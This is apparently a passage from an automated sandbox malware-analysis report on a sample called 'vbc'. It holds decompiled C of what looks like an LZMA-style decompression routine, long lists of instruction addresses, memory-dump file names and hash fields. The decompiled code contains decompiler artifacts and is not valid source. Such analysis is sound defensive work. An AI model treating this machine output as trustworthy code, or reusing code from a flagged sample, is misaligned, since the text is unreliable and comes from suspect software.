                                                														L108:
                                                														__ebx = 0;
                                                														 *(__ebp - 0x58) = __eax;
                                                														 *(__ebp - 0x50) = 1;
                                                														 *(__ebp - 0x44) = 0;
                                                														 *(__ebp - 0x48) = 0;
                                                														L112:
                                                														__eax =  *(__ebp - 0x40);
                                                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                															_t391 = __ebp - 0x2c;
                                                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                															__eflags =  *_t391;
                                                															goto L119;
                                                														}
                                                														__eax =  *(__ebp - 0x50);
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                														__eax =  *(__ebp - 0x58);
                                                														__esi = __edi + __eax;
                                                														 *(__ebp - 0x54) = __esi;
                                                														__ax =  *__esi;
                                                														__ecx = __ax & 0x0000ffff;
                                                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                														__eflags =  *(__ebp - 0xc) - __edx;
                                                														if( *(__ebp - 0xc) >= __edx) {
                                                															__ecx = 0;
                                                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                															__ecx = 1;
                                                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                															__ebx = 1;
                                                															__ecx =  *(__ebp - 0x48);
                                                															__ebx = 1 << __cl;
                                                															__ecx = 1 << __cl;
                                                															__ebx =  *(__ebp - 0x44);
                                                															__ebx =  *(__ebp - 0x44) | __ecx;
                                                															__cx = __ax;
                                                															__cx = __ax >> 5;
                                                															__eax = __eax - __ecx;
                                                															__edi = __edi + 1;
                                                															__eflags = __edi;
                                                															 *(__ebp - 0x44) = __ebx;
                                                															 *__esi = __ax;
                                                															 *(__ebp - 0x50) = __edi;
                                                														} else {
                                                															 *(__ebp - 0x10) = __edx;
                                                															0x800 = 0x800 - __ecx;
                                                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                															 *__esi = __dx;
                                                														}
                                                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                														if( *(__ebp - 0x10) >= 0x1000000) {
                                                															L111:
                                                															_t368 = __ebp - 0x48;
                                                															 *_t368 =  *(__ebp - 0x48) + 1;
                                                															__eflags =  *_t368;
                                                															goto L112;
                                                														} else {
                                                															goto L109;
                                                														}
                                                													}
                                                													__ecx =  *(__ebp - 0xc);
                                                													__ebx = __ebx + __ebx;
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                														__ecx =  *(__ebp - 0x10);
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                														__ebx = __ebx | 0x00000001;
                                                														__eflags = __ebx;
                                                														 *(__ebp - 0x44) = __ebx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L101:
                                                														_t338 = __ebp - 0x48;
                                                														 *_t338 =  *(__ebp - 0x48) - 1;
                                                														__eflags =  *_t338;
                                                														goto L102;
                                                													} else {
                                                														goto L99;
                                                													}
                                                												}
                                                												__edx =  *(__ebp - 4);
                                                												__eax = __eax - __ebx;
                                                												 *(__ebp - 0x40) = __ecx;
                                                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                												goto L108;
                                                											case 0x1a:
                                                												L56:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1a;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x68);
                                                												__al =  *(__ebp - 0x5c);
                                                												__edx =  *(__ebp - 8);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *( *(__ebp - 0x68)) = __al;
                                                												__ecx =  *(__ebp - 0x14);
                                                												 *(__ecx +  *(__ebp - 8)) = __al;
                                                												__eax = __ecx + 1;
                                                												__edx = 0;
                                                												_t192 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t192;
                                                												goto L79;
                                                											case 0x1b:
                                                												L75:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1b;
                                                													goto L170;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t274 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t274;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												_t283 = __ebp - 0x64;
                                                												 *_t283 =  *(__ebp - 0x64) - 1;
                                                												__eflags =  *_t283;
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												L79:
                                                												 *(__ebp - 0x14) = __edx;
                                                												goto L80;
                                                											case 0x1c:
                                                												while(1) {
                                                													L123:
                                                													__eflags =  *(__ebp - 0x64);
                                                													if( *(__ebp - 0x64) == 0) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__edx =  *(__ebp - 8);
                                                													__cl =  *(__eax + __edx);
                                                													__eax =  *(__ebp - 0x14);
                                                													 *(__ebp - 0x5c) = __cl;
                                                													 *(__eax + __edx) = __cl;
                                                													__eax = __eax + 1;
                                                													__edx = 0;
                                                													_t414 = __eax %  *(__ebp - 0x74);
                                                													__eax = __eax /  *(__ebp - 0x74);
                                                													__edx = _t414;
                                                													__eax =  *(__ebp - 0x68);
                                                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                													__eflags =  *(__ebp - 0x30);
                                                													 *( *(__ebp - 0x68)) = __cl;
                                                													 *(__ebp - 0x14) = _t414;
                                                													if( *(__ebp - 0x30) > 0) {
                                                														continue;
                                                													} else {
                                                														L80:
                                                														 *(__ebp - 0x88) = 2;
                                                														goto L1;
                                                													}
                                                												}
                                                												 *(__ebp - 0x88) = 0x1c;
                                                												goto L170;
                                                										}
                                                									}
                                                									L171:
                                                									_t544 = _t543 | 0xffffffff;
                                                									goto L172;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}














                                                0x00000000
                                                0x00406b79
                                                0x00406b79
                                                0x00406b7d
                                                0x00406b9e
                                                0x00406ba5
                                                0x00406bab
                                                0x00406bb1
                                                0x00406bc3
                                                0x00406bc9
                                                0x00406bce
                                                0x00000000
                                                0x00406b7f
                                                0x00406b85
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00406f49
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00406f97
                                                0x00406f9b
                                                0x0040714a
                                                0x00407160
                                                0x00407168
                                                0x0040716f
                                                0x00407171
                                                0x00407178
                                                0x0040717c
                                                0x0040717c
                                                0x00406fa7
                                                0x00406fae
                                                0x00406fb6
                                                0x00406fb9
                                                0x00406fbc
                                                0x00406fbc
                                                0x00406fc2
                                                0x00406fc2
                                                0x0040675e
                                                0x0040675e
                                                0x0040675e
                                                0x00406767
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00000000
                                                0x00406778
                                                0x00000000
                                                0x00000000
                                                0x00406781
                                                0x00406784
                                                0x00406787
                                                0x0040678b
                                                0x00000000
                                                0x00000000
                                                0x00406791
                                                0x00406794
                                                0x00406796
                                                0x00406797
                                                0x0040679a
                                                0x0040679c
                                                0x0040679d
                                                0x0040679f
                                                0x004067a2
                                                0x004067a7
                                                0x004067ac
                                                0x004067b5
                                                0x004067c8
                                                0x004067cb
                                                0x004067d7
                                                0x004067ff
                                                0x00406801
                                                0x0040680f
                                                0x0040680f
                                                0x00406813
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406803
                                                0x00406803
                                                0x00406806
                                                0x00406807
                                                0x00406807
                                                0x00000000
                                                0x00406803
                                                0x004067dd
                                                0x004067e2
                                                0x004067e2
                                                0x004067eb
                                                0x004067f3
                                                0x004067f6
                                                0x00000000
                                                0x004067fc
                                                0x004067fc
                                                0x00000000
                                                0x004067fc
                                                0x00000000
                                                0x00406819
                                                0x00406819
                                                0x0040681d
                                                0x004070c9
                                                0x00000000
                                                0x004070c9
                                                0x00406826
                                                0x00406836
                                                0x00406839
                                                0x0040683c
                                                0x0040683c
                                                0x0040683c
                                                0x0040683f
                                                0x00406843
                                                0x00000000
                                                0x00000000
                                                0x00406845
                                                0x0040684b
                                                0x00406875
                                                0x0040687b
                                                0x00406882
                                                0x00000000
                                                0x00406882
                                                0x00406851
                                                0x00406854
                                                0x00406859
                                                0x00406859
                                                0x00406864
                                                0x0040686c
                                                0x0040686f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068b4
                                                0x004068ba
                                                0x004068bd
                                                0x004068ca
                                                0x004068d2
                                                0x00000000
                                                0x00000000
                                                0x00406889
                                                0x00406889
                                                0x0040688d
                                                0x004070d8
                                                0x00000000
                                                0x004070d8
                                                0x00406899
                                                0x004068a4
                                                0x004068a4
                                                0x004068a4
                                                0x004068a7
                                                0x004068aa
                                                0x004068ad
                                                0x004068b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068da
                                                0x004068dc
                                                0x004068df
                                                0x00406950
                                                0x00406953
                                                0x00406956
                                                0x0040695d
                                                0x00406967
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x004068e1
                                                0x004068e5
                                                0x004068e8
                                                0x004068ea
                                                0x004068ed
                                                0x004068f0
                                                0x004068f2
                                                0x004068f5
                                                0x004068f7
                                                0x004068fc
                                                0x004068ff
                                                0x00406902
                                                0x00406906
                                                0x0040690d
                                                0x00406910
                                                0x00406917
                                                0x0040691b
                                                0x00406923
                                                0x00406923
                                                0x00406923
                                                0x0040691d
                                                0x0040691d
                                                0x0040691d
                                                0x00406912
                                                0x00406912
                                                0x00406912
                                                0x00406927
                                                0x0040692a
                                                0x00406948
                                                0x0040694a
                                                0x00000000
                                                0x0040692c
                                                0x0040692c
                                                0x0040692f
                                                0x00406932
                                                0x00406935
                                                0x00406937
                                                0x00406937
                                                0x00406937
                                                0x0040693a
                                                0x0040693d
                                                0x0040693f
                                                0x00406940
                                                0x00406943
                                                0x00000000
                                                0x00406943
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406be3
                                                0x00406be7
                                                0x00406c0a
                                                0x00406c0d
                                                0x00406c10
                                                0x00406c1a
                                                0x00406be9
                                                0x00406be9
                                                0x00406bec
                                                0x00406bef
                                                0x00406bf2
                                                0x00406bff
                                                0x00406c02
                                                0x00406c02
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00000000
                                                0x00406c26
                                                0x00406c2a
                                                0x00000000
                                                0x00000000
                                                0x00406c30
                                                0x00406c34
                                                0x00000000
                                                0x00000000
                                                0x00406c3a
                                                0x00406c3c
                                                0x00406c40
                                                0x00406c40
                                                0x00406c43
                                                0x00406c47
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c9b
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406cb2
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f46
                                                0x00406c9d
                                                0x00000000
                                                0x00000000
                                                0x00406cbe
                                                0x00406cc2
                                                0x00406cc9
                                                0x00406ccc
                                                0x00406ccf
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cd2
                                                0x00406cd5
                                                0x00406cd8
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ceb
                                                0x00406cf0
                                                0x00000000
                                                0x00000000
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d82
                                                0x00407120
                                                0x00000000
                                                0x00407120
                                                0x00406d88
                                                0x00406d8b
                                                0x00406d8e
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9b
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da0
                                                0x00406da3
                                                0x00000000
                                                0x00000000
                                                0x00406973
                                                0x00406973
                                                0x00406977
                                                0x004070e4
                                                0x00000000
                                                0x004070e4
                                                0x0040697d
                                                0x00406980
                                                0x00406983
                                                0x00406987
                                                0x0040698a
                                                0x00406990
                                                0x00406992
                                                0x00406992
                                                0x00406992
                                                0x00406995
                                                0x00406998
                                                0x00406998
                                                0x0040699b
                                                0x0040699e
                                                0x00000000
                                                0x00000000
                                                0x004069a4
                                                0x004069aa
                                                0x00000000
                                                0x00000000
                                                0x004069b0
                                                0x004069b0
                                                0x004069b4
                                                0x004069b7
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c1
                                                0x004069c4
                                                0x004069c6
                                                0x004069cc
                                                0x004069cf
                                                0x004069d2
                                                0x004069d5
                                                0x004069d8
                                                0x004069db
                                                0x004069de
                                                0x004069fa
                                                0x004069fd
                                                0x00406a00
                                                0x00406a03
                                                0x00406a0a
                                                0x00406a0e
                                                0x00406a10
                                                0x00406a14
                                                0x004069e0
                                                0x004069e0
                                                0x004069e4
                                                0x004069ec
                                                0x004069f1
                                                0x004069f3
                                                0x004069f5
                                                0x004069f5
                                                0x00406a17
                                                0x00406a1e
                                                0x00406a21
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a2c
                                                0x00406a2c
                                                0x00406a30
                                                0x004070f0
                                                0x00000000
                                                0x004070f0
                                                0x00406a36
                                                0x00406a39
                                                0x00406a3c
                                                0x00406a40
                                                0x00406a43
                                                0x00406a49
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a51
                                                0x00406a51
                                                0x00406a51
                                                0x00406a57
                                                0x00000000
                                                0x00000000
                                                0x00406a59
                                                0x00406a5c
                                                0x00406a5f
                                                0x00406a62
                                                0x00406a65
                                                0x00406a68
                                                0x00406a6b
                                                0x00406a6e
                                                0x00406a71
                                                0x00406a74
                                                0x00406a77
                                                0x00406a8f
                                                0x00406a92
                                                0x00406a95
                                                0x00406a98
                                                0x00406a98
                                                0x00406a9b
                                                0x00406a9f
                                                0x00406aa1
                                                0x00406a79
                                                0x00406a79
                                                0x00406a81
                                                0x00406a86
                                                0x00406a88
                                                0x00406a8a
                                                0x00406a8a
                                                0x00406aa4
                                                0x00406aab
                                                0x00406aae
                                                0x00000000
                                                0x00406ab0
                                                0x00000000
                                                0x00406ab0
                                                0x00406aae
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00000000
                                                0x00000000
                                                0x00406af0
                                                0x00406af0
                                                0x00406af4
                                                0x004070fc
                                                0x00000000
                                                0x004070fc
                                                0x00406afa
                                                0x00406afd
                                                0x00406b00
                                                0x00406b04
                                                0x00406b07
                                                0x00406b0d
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b12
                                                0x00406b15
                                                0x00406b15
                                                0x00406b1b
                                                0x00406ab9
                                                0x00406ab9
                                                0x00406abc
                                                0x00000000
                                                0x00406abc
                                                0x00406b1d
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b29
                                                0x00406b2c
                                                0x00406b2f
                                                0x00406b32
                                                0x00406b35
                                                0x00406b38
                                                0x00406b3b
                                                0x00406b53
                                                0x00406b56
                                                0x00406b59
                                                0x00406b5c
                                                0x00406b5c
                                                0x00406b5f
                                                0x00406b63
                                                0x00406b65
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b45
                                                0x00406b4a
                                                0x00406b4c
                                                0x00406b4e
                                                0x00406b4e
                                                0x00406b68
                                                0x00406b6f
                                                0x00406b72
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406e01
                                                0x00406e01
                                                0x00406e05
                                                0x0040712c
                                                0x00000000
                                                0x0040712c
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e15
                                                0x00406e18
                                                0x00406e1e
                                                0x00406e20
                                                0x00406e20
                                                0x00406e20
                                                0x00406e23
                                                0x00000000
                                                0x00000000
                                                0x00406bd1
                                                0x00406bd1
                                                0x00406bd4
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00000000
                                                0x00406f10
                                                0x00406f14
                                                0x00406f36
                                                0x00406f39
                                                0x00406f43
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f46
                                                0x00406f16
                                                0x00406f19
                                                0x00406f1d
                                                0x00406f20
                                                0x00406f20
                                                0x00406f23
                                                0x00000000
                                                0x00000000
                                                0x00406fcd
                                                0x00406fd1
                                                0x00406fef
                                                0x00406fef
                                                0x00406fef
                                                0x00406ff6
                                                0x00406ffd
                                                0x00407004
                                                0x00407004
                                                0x00000000
                                                0x00407004
                                                0x00406fd3
                                                0x00406fd6
                                                0x00406fd9
                                                0x00406fdc
                                                0x00406fe3
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00000000
                                                0x00000000
                                                0x004070be
                                                0x004070c1
                                                0x00406fc2
                                                0x00000000
                                                0x00000000
                                                0x00406cf8
                                                0x00406cfa
                                                0x00406d01
                                                0x00406d02
                                                0x00406d04
                                                0x00406d07
                                                0x00000000
                                                0x00000000
                                                0x00406d0f
                                                0x00406d12
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d1a
                                                0x00406d1d
                                                0x00406d24
                                                0x00406d27
                                                0x00406d35
                                                0x00000000
                                                0x00000000
                                                0x0040700b
                                                0x0040700b
                                                0x0040700e
                                                0x00407015
                                                0x00000000
                                                0x00000000
                                                0x0040701a
                                                0x0040701a
                                                0x0040701e
                                                0x00407156
                                                0x00000000
                                                0x00407156
                                                0x00407024
                                                0x00407027
                                                0x0040702a
                                                0x0040702e
                                                0x00407031
                                                0x00407037
                                                0x00407039
                                                0x00407039
                                                0x00407039
                                                0x0040703c
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x00407042
                                                0x00407042
                                                0x00407046
                                                0x004070a6
                                                0x004070a9
                                                0x004070ae
                                                0x004070af
                                                0x004070b1
                                                0x004070b3
                                                0x004070b6
                                                0x00406fc2
                                                0x00406fc2
                                                0x00000000
                                                0x00406fc8
                                                0x00406fc2
                                                0x00407048
                                                0x0040704e
                                                0x00407051
                                                0x00407054
                                                0x00407057
                                                0x0040705a
                                                0x0040705d
                                                0x00407060
                                                0x00407063
                                                0x00407066
                                                0x00407069
                                                0x00407082
                                                0x00407085
                                                0x00407088
                                                0x0040708b
                                                0x0040708f
                                                0x00407091
                                                0x00407091
                                                0x00407092
                                                0x00407095
                                                0x0040706b
                                                0x0040706b
                                                0x00407073
                                                0x00407078
                                                0x0040707a
                                                0x0040707d
                                                0x0040707d
                                                0x00407098
                                                0x0040709f
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x00406d3d
                                                0x00406d40
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00406abf
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00000000
                                                0x00000000
                                                0x00406c4a
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5a
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00406c85
                                                0x00406c85
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00406c88
                                                0x00406c88
                                                0x00000000
                                                0x00406c88
                                                0x00406f09
                                                0x0040713e
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00407175
                                                0x00407175
                                                0x00000000
                                                0x00407175
                                                0x00406fc2
                                                0x00406f49
                                                0x00406f46
                                                0x00000000
                                                0x00406b7d

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
                                                • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406C97() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						 *(_t613 - 0x84) = 0xb;
                                                						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                						goto L132;
                                                					} else {
                                                						__eax =  *(__ebp - 0x28);
                                                						L88:
                                                						 *(__ebp - 0x2c) = __eax;
                                                						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                						L89:
                                                						__eax =  *(__ebp - 4);
                                                						 *(__ebp - 0x80) = 0x15;
                                                						__eax =  *(__ebp - 4) + 0xa68;
                                                						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                						L69:
                                                						 *(__ebp - 0x84) = 0x12;
                                                						while(1) {
                                                							L132:
                                                							 *(_t613 - 0x54) = _t606;
                                                							while(1) {
                                                								L133:
                                                								_t531 =  *_t606;
                                                								_t589 = _t531 & 0x0000ffff;
                                                								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                								if( *(_t613 - 0xc) >= _t565) {
